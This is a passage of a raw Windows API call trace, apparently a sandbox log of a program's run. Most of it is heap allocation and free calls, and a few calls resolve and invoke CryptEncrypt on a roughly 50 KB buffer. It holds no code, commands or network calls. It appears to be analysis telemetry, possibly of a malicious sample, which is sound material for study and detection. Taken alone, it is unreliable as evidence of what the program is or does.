hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0253.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0253.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0253.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0253.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0253.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0253.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0253.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0253.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0253.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0253.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0253.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0253.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0253.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0253.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0253.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0253.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0253.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0253.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0253.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0253.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0253.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0253.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0253.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0253.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0253.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0253.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0253.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0253.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0253.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0253.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0253.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0253.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0253.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0253.010] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0253.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0253.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0253.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0253.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0253.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0253.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0253.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0253.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0253.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0253.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0253.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0253.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0253.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0253.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0253.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0253.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0253.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0253.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0253.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0253.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0253.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0253.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0253.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0253.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0253.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0253.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0253.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0253.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0253.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0253.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0253.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0253.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0253.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa8c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0253.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0253.013] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0253.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0253.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0253.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0253.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0253.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0253.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0253.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0253.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0253.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0253.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0253.013] CryptEncrypt (in: hKey=0xaa57a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0xc6c8, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0xc6d0) returned 1 [0253.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0253.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0253.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0253.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0253.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0253.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0253.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0253.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0253.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0253.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0253.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0253.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0253.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0253.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0253.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0253.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0253.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0253.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0253.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0253.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0253.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0253.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0253.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0253.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0253.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0253.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0253.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0253.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0253.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0253.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0253.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0253.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0253.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0253.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0253.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0253.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0253.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0253.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0253.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0253.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0253.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0253.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0253.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0253.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0253.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0253.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0253.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0253.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0253.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0253.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0253.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0253.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0253.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0253.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0253.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0253.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0253.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0253.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0253.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0253.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0253.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0253.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0253.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0253.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0253.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0253.017] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0253.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0253.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0253.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0253.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0253.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0253.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0253.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0253.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0253.018] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.018] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0253.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0253.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0253.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0253.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0253.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0253.018] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0253.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0253.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0253.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0253.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0253.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0253.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0253.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0253.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0253.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0253.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0253.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0253.019] CharLowerBuffW (in: lpsz="byte[50896]", cchLength=0xb | out: lpsz="byte[50896]") returned 0xb [0253.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0253.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0253.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0253.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0253.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0253.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0253.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0253.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0253.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0253.019] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0253.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0253.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0253.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0253.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0253.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0253.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0253.022] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0253.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0253.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0253.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0253.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0253.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0253.022] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0253.022] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0253.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0253.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0253.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0253.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0253.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0253.022] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0253.022] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.022] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0253.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0253.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0253.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0253.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0253.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0253.023] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0253.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0253.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0253.023] RtlAllocateHeap 